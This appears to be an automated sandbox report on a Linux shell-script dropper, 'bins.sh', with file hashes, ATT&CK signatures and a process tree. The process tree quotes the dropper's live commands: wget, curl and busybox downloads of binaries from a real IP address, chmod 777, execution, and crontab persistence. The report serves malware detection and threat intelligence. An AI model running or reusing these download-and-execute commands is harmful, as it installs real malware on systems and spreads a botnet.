Analysis
-
max time kernel
149s -
max time network
150s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
09-11-2024 21:09
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
80fbc92fef78f4dd4d74728414ee221d
-
SHA1
a7ad696c79b7b407183a230f08fa116394feb71a
-
SHA256
6755362ddf5c3b8b031ebacaaec1ae40a9fc13d9954a63c8797ce84240f1c7d0
-
SHA512
ad2bfdb0bb89f024cd69ca1619353f7c3a86d222985a3b28fc36a20281961f4e205ef0cbbb93f5aeae226c942df346ce5919f9db4cc65b9accaeb37396c10a52
-
SSDEEP
192:/WRJ4AQsqRh1zn/3C+iiNsZxB1rm2mPn/3C+uQsqRhYVB1rm2i26RJh:tBzn/3C+iimxB1rm2mPn/3C+AB1rm2w
Malware Config
Signatures
-
Contacts a large (2177) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodpid process 1514 chmod -
Executes dropped EXE 1 IoCs
Processes:
tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtqioc pid process /tmp/tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq 1515 tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq -
Renames itself 1 IoCs
Processes:
tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtqpid process 1516 tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.RiiwEP crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Processes:
tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtqdescription ioc process File opened for reading /proc/1574/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/31/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1058/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1540/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1542/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1806/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/16/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/30/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1609/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1802/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1681/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/10/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/34/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1499/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1646/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1586/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1604/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/13/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/85/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1140/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1185/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/187/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1266/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1531/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1535/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1275/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1799/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1742/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1824/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/415/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1168/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1576/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1608/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/490/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/735/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1823/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1827/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/666/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/5/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/14/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/9/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/25/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1679/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1553/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1700/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/11/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1623/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1815/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1622/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/326/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1552/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1819/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/488/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1530/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1785/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1796/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1657/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1678/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/522/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/954/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/956/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1526/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1015/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq File opened for reading /proc/1533/cmdline tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq -
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
rmwgetcurlbusyboxtipd5aLyyzlCilPXJXJMqUIWBz7SJGagtqpid process 1522 rm 1507 wget 1512 curl 1513 busybox 1515 tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq -
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetcurlbusyboxdescription ioc process File opened for modification /tmp/tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq wget File opened for modification /tmp/tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq curl File opened for modification /tmp/tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:1505
-
/bin/rm/bin/rm bins.sh2⤵PID:1506
-
/usr/bin/wgetwget http://216.126.231.240/bins/tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1507 -
/usr/bin/curlcurl -O http://216.126.231.240/bins/tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1512 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1513 -
/bin/chmodchmod 777 tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq2⤵
- File and Directory Permissions Modification
PID:1514 -
/tmp/tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq./tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
- System Network Configuration Discovery
PID:1515 -
/bin/shsh -c "crontab -l"3⤵PID:1517
-
/usr/bin/crontabcrontab -l4⤵PID:1518
-
/bin/shsh -c "crontab -"3⤵PID:1519
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:1520 -
/bin/rmrm tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq2⤵
- System Network Configuration Discovery
PID:1522 -
/usr/bin/wgetwget http://216.126.231.240/bins/EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ2⤵PID:1525
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ2⤵PID:1526
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
112KB
MD505d7857dcead18bbd86d2935f591873c
SHA134d18f41ef35f93d5364ce3e24d74730a4e91985
SHA2562cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70
SHA512d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e
-
Filesize
210B
MD5c56b51c31b07036326f1f9addb3f8e88
SHA100be82cd2d4609a1bd1226a51b90d0dc2305aca4
SHA256dadcdd124053b518a4725004f3e0ba94138b2be11f67919e35cdadc5fc7ae09e
SHA5125252e018265a8f79e6726f5a933eaaefd32e7253bb40417c7ac8111fc08b7d6dca472a23ea7be425ffaddfa37855109bdbdf31ccf056c1787dc78263c5b67382